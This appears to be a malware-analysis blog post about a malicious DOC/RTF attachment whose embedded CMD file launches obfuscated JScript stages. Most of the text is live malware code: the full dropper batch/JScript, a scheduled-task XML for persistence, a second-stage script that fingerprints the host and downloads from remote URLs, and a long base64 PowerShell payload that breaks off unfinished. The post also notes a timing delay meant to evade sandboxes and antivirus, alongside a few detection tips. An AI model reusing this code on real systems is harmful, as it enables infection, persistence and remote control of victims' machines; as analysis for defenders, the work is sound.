Although at the moment of writing this post the detection is much higher.
In any case, this is an interesting case to take a look.
Both files, the DOC and RTF, contains an OLE object which it is a CMD file.
The CMD file is a batch file which contains a set of windows commands.
This means that a cmd.exe command will be spawned in order to executed the commands in the file.
A first use case to detect this malicious behaviour is to monitor all the child processes spawned by any Office program. This is the same approach explained in other posts in this blog.
The CMD (unlock.cmd) is the following
@set w=wsc@ript /b /e:js@cript %HOMEPATH%\tt.txt @echo try{var fs=new ActiveXObject('Scripting.FileSystemObject');sh=new ActiveXObject('Wscript.Shell');p=sh.ExpandEnvironmentStrings('%%HOM'+'EPATH%%')+'\\pp.txt';var f=fs.OpenTextFile(p,1,false);for(i=0;i^<4;i++)f.SkipLine();var com='';while(!f.AtEndOfStream)com+=f.ReadLine().substr(1);f.Close();try{fs.DeleteFile(p, true);}catch(e){}this[String.fromCharCode(101)+'v'+'al'](com);}catch(e){}; >%HOMEPATH%\tt.txt @copy /y %TMP%\unlock.cmd %HOMEPATH%\pp.txt @echo %w:@=%|cmd #function b64dec(data){ # var cdo = new ActiveXObject("CDO.Message"); # var bp = cdo.BodyPart; # bp.ContentTransferEncoding = "base64"; # bp.Charset = "windows-1251"; # var st = bp.GetEncodedContentStream(); # st.WriteText(data); # st.Flush(); # st = bp.GetDecodedContentStream(); # st.Charset = "utf-8"; # return st.ReadText; #} #var fso = new ActiveXObject("Scripting.FileSystemObject"); #var sh = new ActiveXObject("Wscript.Shell"); #var fldr = sh.ExpandEnvironmentStrings("%HOMEPATH%"); #var p = ""; #p = fldr + "\\whatis.ini"; #if(!fso.FileExists(p)){ # var f = fso.OpenTextFile(p,2,1); # f.Write( b64dec('ZnVu......
# f.Close(); #} #cmd = 'wscript.exe //b //e:jscript "' + p + '"'; #sh.Run(cmd, 0, false); #fso.DeleteFile(WScript.ScriptFullName, true); #function Abracadabra(){ # try{ # var objWord=GetObject("","Word.Application"); # objWord.Visible = true; # objWord.ScreenUpdating = false; # var objDoc = objWord.ActiveDocument; # objDoc.Content.Select(); # objWord.Selection.Delete(); # var objRange = objDoc.Range(); # objRange.InsertAfter("ȪȪɃɅɄwɁȦɍɧɬɶɵɗɀȄ"); # objRange.InsertParagraphAfter(); # objRange.InsertAfter("Ȫ ɃɅɄɁȦɍɧ ɬɶɵɗɀȄ ȪȧȀɥȦȿɃɚɚɏwɳɨɁǿȨ ȭȰșșɐɩɘɂɂȕȗȘȱəȓɏɾءاةیییڱڱۉ"); # objRange.InsertParagraphAfter(); # objRange.InsertAfter("Ȗ ɤɤɢɩ ɕȧɵʋʒɛȚȃȃǾȺȻɄɜwɯȓ ɓɻɘȜȾɒȻɓə ɤɤʂɦɑɑɂȩɶ ʶʂɖɑɤɄɅɄǽȹɥɿɅȮȤɵʷȭɂʐʉʉ"); # objRange.InsertParagraphAfter(); # objRange.InsertAfter("ȩɄɄɤȯȮǾɐʥ ʥʥɋɏɏȰȦɬɫwɒɯɚȩȩɈɓȨɃɃ Ȫɏɏɴɴɗȫȧȯ ȯȯȑȑȕȗțȝȝɦɤɍȹȦȫ Ȯɭʁʀɸɷ ɣȾɗə əəɒɐȸ ȺȚʥ"); # objRange.InsertParagraphAfter(); # objRange.InsertAfter("ʣɸɗʄɻʎʡʠʠʐʐʔʖɫɓɑɣəȹɴwʏȽɞɞ ȻɄɜɯȓɓɻɘȜȾɒ ɑɂȩɶʶʂɖɑɤɄɅɄǽȹɥɿɅȮȤɵ ɃɅɄɁȦɍɧɬɶɵɗɀȄ"); # objRange.InsertParagraphAfter(); # objRange.InsertAfter("ưnjƠƞưƤƊƌ ƛ ƳƴƤƊ ƥwƥƥţƠƠƵ"); # objRange.InsertParagraphAfter(); # objRange.InsertAfter("ŸƌƌƉȮɐɐwɕɖɔɔȾȨʞʞɐʁ"); # objRange.InsertParagraphAfter(); # objRange.InsertAfter("ɂȩɶʶʂɖwɑ Ʉǽȹ"); # objRange.InsertParagraphAfter(); # objWord.ScreenUpdating = true; # } catch(e) { } #} #Abracadabra();
Without going into the details of the execution flow, in essence the CMD, while executing the code, generates and executes an obfuscated file, which it is reality a JS file, and this same process is repeated several times in a loop. Several files with different extension are created (.INI, CHM and TXT,) however all of them are executed with the command "wscript" as showed below:
On important thing that happens is that there is a delay of 100s before to execute the second script in order to by-pass sanboxes and AV.
At some stage there is a schedule task created base on an XML.
<?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <TimeTrigger> <Repetition> <Interval>PT47M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <StartBoundary>2017-05-22T20:21:00</StartBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>wscript.exe</Command> <Arguments>//b /e:jscript \Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}\59d76612d0ba68.06041356.txt</Arguments> </Exec> </Actions> </Task>
So now we know how the persistence is achieve: via a schedule task which executes the command:
wscript.exe /b /e:jscript \Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}\59d76612d0ba68.06041356.txt
The directory "Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}" is used to store all the temporal files created and executed via the initial CMD command.
The schedule task can be seen via the windows GUI
At some point, there is some commands to map the system
The WScript runs every minute, so it is a good indicator also to check
There is a moment in which one of the scripts spawns a PowerShell command
The script basically acts as a dropper using powershell.
function readFile(p) { try{ var fs = new ActiveXObject("Scripting.FileSystemObject"); var file = fs.GetFile(p); var stream = file.OpenAsTextStream(1, 0); var content = stream.ReadAll(); stream.Close(); return content; }catch(e){ return ""; } } function pausecomp(millis) { var date = new Date(); var curDate = null; do{ curDate = new Date(); WScript.Sleep(100); }while(curDate-date < millis); } function getProxy(){ var WshShell = new ActiveXObject("WScript.Shell"); try { var ProxyEnable = WshShell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable"); if(ProxyEnable == 1){ var ProxyServer = WshShell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer"); return ProxyServer; }else{ return ""; } } catch (e) { return ""; } } function downLoadUrl(metod,urlArr,url,val){ for(var i=0; i<urlArr.length; i++) { try { var xmlServerHttp = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0"); xmlServerHttp.open(metod, urlArr[i] + url, false); var prox = getProxy(); if( prox != ""){ xmlServerHttp.setProxy(2, prox, ""); } xmlServerHttp.setOption(2, 13056); //xmlServerHttp.setTimeouts(0, 0, 0, 0); xmlServerHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlServerHttp.setRequestHeader("Charset","utf-8"); xmlServerHttp.setRequestHeader("Connection","Keep-Alive"); xmlServerHttp.setRequestHeader("Keep-Alive","300"); xmlServerHttp.send(val); while (xmlServerHttp.readyState != 4) { xmlServerHttp.waitForResponse(1000); } if(xmlServerHttp.status == 200) { return xmlServerHttp.responseText; } }catch(e){} } return ""; } function b64enc(data){ var cdo = new ActiveXObject("CDO.Message"); var bp = cdo.BodyPart; bp.Charset = "utf-8"; bp.ContentTransferEncoding = "base64"; var st = bp.GetDecodedContentStream(); st.WriteText(data); st.Flush(); st = bp.GetEncodedContentStream(); var result = st.ReadText(st.Size - 2); return result.replace(/\r\n/g, ''); } function b64dec(data){ var cdo = new ActiveXObject("CDO.Message"); var bp = cdo.BodyPart; bp.ContentTransferEncoding = "base64"; bp.Charset = "windows-1251"; var st = bp.GetEncodedContentStream(); st.WriteText(data); st.Flush(); st = bp.GetDecodedContentStream(); st.Charset = "utf-8"; return st.ReadText; } function cuid(){ var rmac = "1"; try { var oWmiService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); var cItems = oWmiService.ExecQuery("Select * from Win32_NetworkAdapter where physicaladapter=true"); var oItem = new Enumerator(cItems); for (;!oItem.atEnd();oItem.moveNext()) { var mac = oItem.item().MACAddress; if(mac != null && typeof mac == "string"){ rmac = mac; } } rmac = rmac.replace(/[^A-Za-z0-9]/g, ''); } catch (e) {} var sn = "2"; try { var FSO = new ActiveXObject("Scripting.FileSystemObject"); var strDrive = FSO.GetDriveName(FSO.GetSpecialFolder(0)); var D = FSO.GetDrive(strDrive); sn = D.SerialNumber; } catch (e) {} sn = b64enc(sn.toString()); sn = sn.replace(/[^\w]+/g, "").slice(0, 20); rmac = rmac.slice(0, 20); return sn+rmac; } function getRandomInt(min, max) { return Math.floor(Math.random() * (max - min)) + min; } function randomString(length, chars) { var mask = ''; if (chars.indexOf('a') > -1) mask += 'abcdefghijklmnopqrstuvwxyz'; if (chars.indexOf('A') > -1) mask += 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; if (chars.indexOf('#') > -1) mask += '0123456789'; if (chars.indexOf('!') > -1) mask += '~`!@#$%^&*()_+-={}[]:";\'<>?,./|\\'; var result = ''; for (var i = length; i > 0; --i) result += mask.charAt(Math.floor(Math.random() * mask.length)); return result; } function randomParamName(){ result = randomString(getRandomInt(1,3), 'aA') + randomString(getRandomInt(1,8), 'aA#'); return result; } function randomParamData(){ result = randomString(getRandomInt(1,12), 'aA#'); return result; } function randomUrl(str){ var result = ""; var parArray = []; parArray.push({ name: randomParamName(), data: encodeURI(SimpleEncrypt(str)) }); parArray.push({ name: randomParamName(), data: encodeURI(b64enc(kkid)) }); for (var i = getRandomInt(0,5); i > 0; --i){ parArray.push({ name: randomParamName(), data: randomParamData() }); } parArray.sort(function(a, b){return 0.5 - Math.random()}); for (var i = 0; i < parArray.length; i++) { result += parArray[i].name + "=" + parArray[i].data + "&"; } return "?" + result.replace(/&+$/,''); } function SimpleEncrypt(a){ var str = b64enc(a); var chrArr = str.split(''); var pos = -1; var resultArray = []; for (var i = 0; i < chrArr.length; i++) { pos = alfIn.indexOf(chrArr[i]); if( pos != -1 ){ resultArray.push( alfOut.charAt(pos) ); }else{ resultArray.push( chrArr[i] ); } } return resultArray.join(""); } function SimpleDencrypt(a){ var str = a; var chrArr = str.split(''); var pos = -1; var resultArray = []; for (var i = 0; i < chrArr.length; i++) { pos = alfOut.indexOf(chrArr[i]); if( pos != -1 ){ resultArray.push( alfIn.charAt(pos) ); }else{ resultArray.push( chrArr[i] ); } } return b64dec(resultArray.join("")); } var evalString = (function () {/* try{ var fso = new ActiveXObject("Scripting.FileSystemObject"); var sh = new ActiveXObject("Wscript.Shell"); var jsLoaderDir = "{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}"; var PS1Body = "JEVuY29kZWRDb21wcmVzc2VkRmlsZSA9IEAnCjdMMXJkK0pLc2liOHZYOEY3OTQxVTNablZRVzZvRXVmdGRkN3VOOUJCaGtFZTJyVlNFZ0pBaUZBU01tbHovN3ZFd0pqQThaVnh1WGUzV2VtYTlXeURVaVJrWEY5SWpKVEZDSi9FTG96UDJITWdzd21kTkpCOEplLy95V0IvelF6TUtlN3YyNTJQK04vdisvZWRFSW51TkZtUzNkMzQyK0o1S2RFM2ZSdE01d0ZHM3o1UVE4aTUvWnI0dmVZM3U5ZnZ5WStQQkQrOUFNNjNIZm9JQlhrc09wc2RqUnVkei9wTExqNTRQNlcvSS9FQnpmeDJRc2ZCL3BTYy94aE9FckVIeEN5di9qdmo0TWZydnI5Zy9zMUh1YjQ1V2RyUFF0T2h2cGo5ek53d2lqd0g2Lzl5eDkvS1J3RWx6R1hqaVRtbk1ITWRvNGxlQzYvbjVQZDBiUWZlUG05dlZtR3p2UkxkdVl6SndpLy91MXZoV0EyM1hPVEhaa0IzbVJ1Ymg1bEg0OTBKcDlibk1hdmEwbE1JQU9KdFNJbFhEOHg4NTBFUFV6dFpqQ2F1UU1uNFM0VFU5TjJFdEU4WVNGOUc2OUt6R2NySjFpT0hNOUx6SVBad0ZrdUU1WWIrdmo3OWtrMmVyREpldzRydDNMbFk2dDZrMFNXWWVENlE1U0k3WG4zZ2ZjTkdmNzBIVEl2R2RNek1wTDRQVEw4ajhqRXdtcmdmZDhqSXB3UktaamVjazlsRUxqejBQSm1nMG5Na1RPSUpmYzlTdUpMbE14WTIzc2F1eHVYUndiemE3YlphT3ZwaHQ3ZXZmeFFTcmRMMzZyNVhpd2xZZjlXcHRuVTIzb3JyWDJycDQxdnRYeWpxSmZpajNsbC83bGVhdVhUdVcvZGRGbi9wcGZyK1hoU3FjUmZFMXd5bWR4ZmtTMlZhN2x2V3F1Wi9hWTN2MVhMdFJwZTgzRVEwdW5NLzdpL0pKZlAzQmNmdWQ2ekZrOTR6K3VIcnVzTC9PNDFYdE53VnArYjF0Z1poSWtITzkrLzJ0KzErL2xvWlVVbi9MeTdXZC9NbmVXNXR6OTk4ajJ5VDlmblpsUFRqV1g5ZTNvKzM3OUEzOHBHUWVENDRmNzEwY1ViMzV5NmcvUnk2VXd0YjNOeGhKWkRQV2ZINlpmRGRiSEIzSHc4dS9uajdSUGR3M3VaeVBWc0o0aUZ0aC82Uzg2aHJ1K2MzWHB6enNpbngvQndOSHArNm9aZnppaW5CN0hyNGdSYmtYODBmbjFtUjU1ek5QclpiYWRzN0s5K25ORCs1VWVNTjNSbm5rOWtNVmFoNDBRRE5OK3lUMmV4a0E5c1JuN29UcDB2WlI4dGZqWnZPd0hEeUxQOFVqY3h5SmhlZXBrTzBlT3NDRFBCRjlUM0VhSGx6ZTN2eWE5UEN2ejE2Ri84T3QrNHI1Ky8vM1J4M28rbTZGSkRkeENieUJPbjhhdWo2Wi9JNDJIeThhMDNIeC92eGZsKzFDTExjd2Y0MSsvM09CRk8rbnA3a2VJRGdacUxjelc5bTQvbGVycVkvOWJRdnpVMXZkeHNwR3ZmU3JtV3dLTXZGc3ZaSTJxSjVKcExXcmVKLzBvMG8vQnpJL0s4dDVPWHhFdmsrWmZJUDA1ekZ3U1B4c29HamhrNjhUczN0eGVkN3I4U2FkditYRWZyUVZFKy9ONFJhc3hDUjBOZFkvTGFKRDdITHZHa2lNVG5qdWxGenRHNEZ4VWN2OFN3ZFovVnp6NTR1cmk5TTVQRVhnYTV0SjcrbGl1MzhsbTkyZW9kdWR2QnVPSVk4VEVkaGJPYXVabEY0YWRFMmwrNldjOWNMajhsSG43dGRmd3BrVi9QOGJjYkhxNXNPNmJuMko4U0dRZHhpVk53SGM4dSsyNzQ4U3FiMnNueDR5Vm1ZM2Q2WXZQSnYzZHlpbS83K2ltaFBHbmc1b0pCN0hpNitkaHhnekJDbDdMdEFGMy9vSCtCLy9wa3dMZTNYOXBPMktSMDZZUTN5WXNXOFowQjJ1N1crVEZaOGJLaFhacjdQOVRtTGc1NE1MK0xadk9DY1JYS3RmeTNFcWJKZk92bkxLdnRMQ0xNTmE3cC9jTnM2NGpYMXhnV24veHVJSHZRZTkwY2pQRFZVVVE1VXYwcmc5WURxVVlVcTZ4SjIvdlV0WHdQbWpybWx4emFUVHMwcC9QTDlua2RRVzNteHRsS243VTNVMnZtNmFibHZXRDNiNXo4anV3TEhub2R5ZGdsbTdRNWo0VnBlaVVIMFh6d0hqS05DdzF6Z0VKd2w2RTd1RVpOeit6d1QzRHk0OUZPUGZ6WWQxOXc3NmZrdWJ0TUV2L0YwOGN6ZmwvbDZHTHlWVGxrbDVaamdvLzUrYjJTUjkwY3o0S2E2MCtjb0lNRkp0cHJiRlM3RnNBTFEvQlhEK0g2Vnc0aHZDVUZObWwyWnI4NUVmNlFlR3dkbUNMd2J4dWptdm5qY1pTM2pYUHZ1OWVPeEYydGtnY3cwcVI1UHd3MnU4RDZpbUdrYTRlSnV5T3ZWUXQvdGVtV3ArYlFpWWM0RUpmRUY0bGZyL1I5Smt4Nzd0Q2ZPcThSajNDMUZncXU1MXd6d05YeTN6bDNFd096R2JyK2NCOS9qbHp3ZWVvNDhaUHJZMG5zNkc4ZTd2cTRFczl1WndTdkgrUnFPOWpONmNwQjNxYW5kbVF0cnhUWjFTRm1ONXZyQjBwZGJRbzczUEJBZjVmd2ZtemVxYXNONENFd3g4cDVCZm1ydGJJbnZ3ZHZyNmpicEt1RmxCMDVnMGs3bXI2QzlodVRGbUx2d2FUbExKMkF2U0pLeW0vVXdHNlU3R3c2ZGNNZkQ2SzhxYjdkNldIKzZwa29iMHkrOFNDdm5ZaDZ0VUhWWnJFcEZUeHorQXB6NHBKWDYveFF5TFNZbWZidGVFYXZHdWRxV1NHV25nWGhvZjY2V0xTL05OajFVS1U4ZmZOZzEwTUtOTEJaRkF5Y3R3MzNCa0VPbkYyTitLYnhyc2NEV1N6UlhPb080a0x2TFNOZW56NWplTlp5dkJrTytkWnBYcDhYY280VkRhOGQ1dnJ3blE0R0l6ZEVuQmdGVjA5S3V0cFdpdDdNTWowdERLNGRTcjdhVFBSYSswMmFVcTQyanpnaVptYytkWWR2R2xDOTJqUXlzOGkzOXlIbHlzSDQ1UFVGU2xxL2VwQ3I3U0xuZU9abVA2T2NzMS9nbkYxckkvejFwVjIyMW5wWVEzcnNibDAxNHZVVjJVUHl0NjhkNllXNjdNTUxiWnMvb1MvMmZNelQ3dGp6MXRmcmVtUUMvOStyUnlid3IrcVJvYW44dTBmMjd4N1p2M3RrYitpUjdhbS9Ua1RYaCtSbkhianZFTDllMWYvdXdQMjdBL2Z2RHR5L08zRC8xM1hnWGg3bEhUdHczeG5rN1hvNDc4QjlKN1AvUkp2dnRSTjVXNzM1Nmc3YzlVM0VOelhncmk5aTM5NS91NzVuK1JQdHQrc2JtRC9WZnJzZTRmMWMrKzE2TVBhejdiZnJNZFE3dE4rdXh6eHZhcjlkand0K3B2MTJmYVo3Yy92dCtxVDAxdmJiOVQzRm4yeS9YWjlJM3Q1K2UwTno4ZnIyMnhzYWl1L1NmcnUrdGZpejdiZnIrNHh2YmIrOVVCRmZiblVKL0ovZmZzTXh2OXQrRS9pWDJtOE4vZUdTOXMvdVR2c1R0cUFlTS91cXRwc2t2bVlUYWh1TFovTWhCUC8wdHNtNEhEKzM1Nk90Z20rbSsyd2o1a3VOMXRmdG9qd1c1WjlncnlmRG5acnFpUVgrMEVwL3RqLzhwMXJwSzV2RG92TC9tcFVLL0xWVytxZEUxWlBoWHJMU2wyTnBydG4rNzdLWi80blYxMWpvNjhLbzgyMzZzSHp4MDN2RW5XOER5NXUvRTZYM29oTjQ3elczdVJtTTdIZlpUSTh5ZDlIZHNEcDZKMnJtK2gycExkL2xFQWJTZVM4VkxwL2FaRDlIeVgwM2p0Nkhqa2ZOZHpQUEdmTm5QNmIwUk1yNUZqakwzZDNuSWZxTWNPQWN6ZmIzcjArVVB5Vks1cDdDdzluTmo1Y1BnTzRqOG85UGdONzdVOU0zaDQ2OWkxOS8rMXRtZzNmdURyYy9rZDBOdDNzUENmN256UnNQbFI3MS9YWjhZdUZ3SHZ1Zm92SjN6L251VHRwbW8yVTRtejRPOFhEcnpma2gyRS9QcGZMcGVFYWY0Z250RVVKQ1BPYm9TVlZ4ZVhNMjJzMHB3N2QvZVoyMU9GUFhmaWZEUTFJNHU2dHRqMytsOGZIL090YjNMMkVhWFBLWmJmRHZheHdZbG54bkZZdjlkWGoxSEp6OEdhYzRud1k3TzhINWhPWmV3SHZ0ZkRaR3RmOWRNTjhwdTYvQmZmSEpycWZoZkJUYWp6MHRGbTJzOFBpWTM3KzlETDFNT1hheVJ4bStrNHM5SE14KytmajBkVEg0TmVlODMzS0t0R1d1WHQ2LzhjWVR0UDhRbW8vckRPOHkrVWU2Tlh6UDN5MnN2UXZkeHpXNjUreSt4d25xQzl6K0F3Nzh2am9kbk1hdFB5RWxuQTE0bWhiT2d2NExxU0Z2YU0yVy9sN1BqZmdUa3NNNXc2OU5ELzlJOWIrOHV2VGV4L0ozVzJlK3U1SGxTbnJ4RHBsM3BIZElxajg3ejVmM3ViMHRVaHllcC9TdVVTMmU3THNRZk56OStLNXNQbEo5Zno1amlzM0FqanM2MTRmSmN3LytFd0xsc3lGUFErV3pJUGc0N09IWmVHZVA0UHBqZjhYenAzVHR3SmJwaDVlZjFQWDQ2ZXVlMW5WMnoxVVBHOHJYdjJXYjlYcFpQMHcxdVU3aXY4ZG5tcjNIQUsxOE85L3E1RTlINE45ckJHMnZtWHoyWHM5L2k1L1ExbTJWOWFQQnhQZWJTQzUvTGl2eHZXWnh0R0t4bjBzNmczL3UzajJSRy8vZW8rVnF0YWNCM2swcGU3WFg4dW4yRWZ2S2UxRi9mQVJmOC81SUYxeVNmOEVoVDczdDNDbkx5OWduSmZIbS9DR1poNGRNWXREU3dnQkxzaVZpLzhSblo1RlFYdlJ1NUhUd0VQN09xQjAvOVRIK2Q5MlRIOXVIWnkzdWNjK25INUI1NmNtUGoyUmlQaDA3Q3A0ZTkzWmNudTBqemRFVC9WNStEbURjTkh5NDBIV1dOeGpRSDhuRS83b2pKM0FPQWV6dmlRL2Z2dXczN1J4b1o4M0JDR1dhOXUzNHM5b0Qrdi9Tbm50dWVQUHhmLzJ2ajdlL2YrYStmc2t2c0lwYll2VzFENEcyaDlYMncyTkpkd3pmKzB1VE9nMjhtVGwxSnh6TjdEaDJuczBqWm5VUEVldnVJSmd0WnpUOHNyT1BMeGR1UDY3bThiNjkyRXNvVTIvMytMY0xkOFRrOTMvZWZEeTc0NHpZa1pHOGp0YlJEY2VrcWs2QTNEOHhkVGJxbDdMUFpoTXN3MzNNcm5FRi8yQTh4L1Y3T0oyamJaL21tYjI5UDEyenA5Wnk2T1dPd3d2OWpNZTdiaDRHK1hUSzhPMHpYejJkNkRQdWY5UkFlUnp3NnhQSG40NHMvV0hhbDd3MjUzak84QUZNL01odEVhN01vNzBkL2I2ckcyNi9YbkxHeExGVEgxOFMzL1A3MTZjM1BqemVFeHZEelpHQTkxZmVKRzl2TDdyNzhRaGM0bnlJb3dGYU8vbnVnaWw2Y21mbTJsOHZldjIxVC8xODJ4TS9IejV3N0lQUWYvYVpuLy9jNTMyV2ZjeFZHR1ZmZnVEbnF3dlgrdWJZRHBIVXgyZGw4NzVJUGlxczQzcDc5K2ZIcCtuWEl3OExVM01aSHNoOXZkeVpQR0xxT1pRL3VnNTFwcmZuemdETDlkMVRmaE1sTjM3TWM5c2RIbGo3ZUZIMldkUHpNTnZzSHM3czc4b1ZsRG1XdUppWEF2dlRzZUYvbDcrNHMxaWV6ajBuUGcrMFN3Kzd2ZUxJMVQ0UTdGSmQzRGc5TnFSOThQenVEQS94ZFI5blBoNDNkcC9taDRiZDltYmhwOFJESnpGVzhKTS92VFNKazlHdjRmK1JSRGR3UTh5YnUxanpnN0xuVWtCck9Ec2JONFBOMDhPRmo2cU1RMXMwWGhtUHd5MEs2QXk4SkNZWXFoMFBjeVBtMnNUeDlaZXBIRXp0Z2RLeElUKzBqbU1JdFY4M09mdDFtM2o4L1BZeThkYy9JeGNOREljL2pGNllCUWVwUEhRdWI1NU4vZFBsZVp4WGxQdG5NcCtBMUF2QTlJVHBRKzE0VVhpL0hsbjhYcUVqL0dXL1JobkgxMSttOGdabFBMMXg4YVBMT2pvZTh6MTFkQzZSVDVlbjl6WWRuVEI5ME5GRm1SN3BxR3U2SVhMYXhuRG1PZnRFOXhwVlhianR1elN2VXR5RFRvNFZjb0hrZStybEJTbDgrdTVjM3FhbFN6TTVLT3Q3VXYzMVdRUXBCSTV6Ull5TEw3OUk0OVc2dVhjZm1seUhkbGVzcU14czVsMEliekhoZjBCME84ejUwOFVaL0ZSczIzRjhGdHBPWkhha2diTjY1RFZhT0wvbFJXSS9VTWREb1hzNWJqMnY1OTVOQVJlbS9PbEYzdCttaUhQdUQ4bzRlLzhGaFJ4Si9wWDZPRzlwWEtEMGF0LzRrVnBPSytQMzFNclp2RCs5TklVMzYrU1k5U09WWEpMZWtVWjBKNGczUEY2VC84OXVlWkhXdFFIclVwZzZJL21lT3JrdzgwOHZ6dUZ0V2pubi9xQ1dTeEk4UjlIWjJYenpXWjg5N3NyQVVTNTFCaDVmdmJXeDk2Q0d1QXMwZlJqblFVUnY3ZkZkKzVWREwzMjlTNHd0SHRuQ3NpMEl5Nzc5STJMblgvTnlTaXplUEhIVWVqajhSV2RCNHVhREcwdnA2WHVNNG1zZnZyem9TT2k3a1Y5dGdyc3FLaGJEelFYeHhpT1I1eE04K1RLa0p4Ny9lTUZLZGw4ODlMblZTZk1QaDZzT0d2M1FZdVo1UjltbE9FOHRMNGtaTnp5ZjFZZUNHeXpEaHdkczdJOGI3RHR6QjRJM3NiSEhoeVljRzk5SkwrLzk1ZTdGUHBaSzR0Y1BqZkRoV0Q1ZUhudnpxK1cwMzlUeTBNODZXc1Q2OHZ4RXkrMVI5L0NQaE9NdG5mK084eEQ0azNsY2lzelBwM0ZWOUVQVzlkbCtDMFVVb1AxZGxNcW54RXVzbnU3S3VMM0E0TTZXME1hKzZMT2QyRzV1OTM3emZLQXY1MXVNemszdjBJQkZhdCtWU2Z4bFk0bHpQMzFVVnJ5UDdNdlRPWnd2NTk5ZmNObVpQL3lVcFZ5VTZ1MHVtUHoxQ21YOXdHN09sSEZrT2M5bjhGTkc4dlAyY2JDTVo2WXhkTTRZL1hLNk53NHZpYjhDN1pKSnZhaUc3eEk4Ly9SazR4eks4TXdPanV6d1JhMjNJK3N5SDhqemoyYjM0ZnN1Y2NMTEgwZGU4R3lWd2o5c1ZUalBCUyt3ZlFrMVhBc1d3bDBXZmJwcGIvMUgxV1NNYTdoUGYva0IyWFBFOENxeVR5dk9SKzNKQThoNEdEbCt0UVBzbU5jZVVxSVQ3Q0hnN3FPYmgrdHVYeURBdjVJQWY0RkFJZDVkOHNQN0Q4OE5QdDRBdkl1Z1J4UDRrcDJoeCs0V2VJL1oyci85TEc1bHpTRFlOTm5PNDVNbkgxMkVNOC9HT2Y1aXhzTy81eTd4SzFwVndvcnZldmJSWVJQV2gzWTBqYlY1Tk1MdWV4ekp5U3dPYnoyeS9aZG5CSTlFZWZoZXlKajBaeXNPRFBIdWcwTGgrVTM3WUhOOFhhRVFINTJQcFJpdnlTY3ZPZm96QVhMUExybUlMVjRoL04yOUwzbnpKWnBZQTh4V2lWK3lwdS9Qd29UNUlPN2Rkd2t1RXpPYXNGMUtuWGdGTEJFdi95OS8rVTVzT0xlK1F4ZzlFdXluUlBKeTEvNkYyUGJ2NlBGL1IvUjR2TzJmRWtYaSt5NkZpTS9IOGVEOHBsL1JKRjhJUFllNUh6SDFGR1Z1bjEzK2doUEhCQWpXbnlucHp3OFFyNG1tc1hqTzV2YW1tSGs2OG5mNVB3MUd5OGdLNDYzRy81eUlGRGVOOW12Yjc3MnBLVHpyZmNTYklQTDdydVcxVFkvd1pHUFRydTN4dURsMnQ1LzFVdnc1L1Q3VUMxK2QrblRSOFZiTUYzWnZKdmI4NzRyNm1DWC9aQy9yU1huMDdPT1RyMm5jUGJMdjhmb25FdlpzK1E2MXhhT0VYNndwbmc2STNWN2cvOXJTN0REZTdlTmJoeWo2TktFdmh4TjF4MXVTM0JNeDdKN204ZlpaSDdQLzhzeFBHaHd2MWRybmZIMTVmSUJGNHJOLzJOWXFwbExQRUUrNGQrcXl6MHpQdGM4ZnpaQllIc2g4T2ZiazF6Sngrb0NLTDd2bkxPK1MwQSsrOHZRWm5uMW1xT2REblY1K1pQQ3hELzZnSjNScTJydG5YL3g1T2hYNDI2dW1ldlJJbHZPcDBzZHZiZjZlbG01ZWJvcWNIUjU1U0JSbnNlYkw2ZjdjMjUxOS9laWFpNGxFeXljb0RoNS9lL2tPM1NidzBrdFd0dVA2NXJBVDlxRVg4RG0rNWFsZCtUa0dKTHYzemk5OHZPWUZMdUk5eGpzMkhyNGRmZmRsNnk5L2VmcU8xWERrSkpZWXdDLzZ4SEhZZklyM2NZcGFudTJaMzRlcjM3L0d1eDlQRThQdEYyLzNEZkNYcWU2YzdWU0xaNTUyOU1ESFhXOWpYL0c4MEZwNzJrUGNSeU8vTUtVUFIrVDJrZmIxbzUrMk9pNlNmRmhYZWpGb0gwZnJMeGU2MnVmODNaNElhbThvWjhPOVlBc0liVDZHYUExb0Fmc2JFcnM3NHNJcjV2NzdJZkI0ako4S0lXZTh2aHhGem85OG5DOWFsSDM3QWFISGYrM2c4TEZxVG80QTdTKzYwQUlkUkVId0lPZmZFaGZGLzNJTDduaTAwNU04RDl6OTllU0pDYnZ4ZHNkeWRvVDNwdllxc3pqaThnSzVLd2hkbnVCUHBJUGoyUncwK2JqMzRtenV2LzV5NFBZelp1eS9KLzltSlAvNEpmR1pQczNpdng3MjNwVm15L0Q1UE45a2RZaE00eTJiTjRjeFRsbmFHMUw4MFpNeEhWN0ZCdlZpNUhxNjdybE43UmcrM1BiQStITkN2eDhJUEM5czlnRXd2dkh6MUF3SG84UXZYLzc2LzU5US9QTFhYMTdzN1R3Yyt2cHBxM2padkEvSHloTGswYzdmMk85Ly9KNzZjMXM1a1NNTzRheGZkTSszVysrVHBFNU1kOGZQeTl6c3gvM3BxUDZDZkIrdFpDZmN4OW52bHdVRS91YjJKNFc5OTh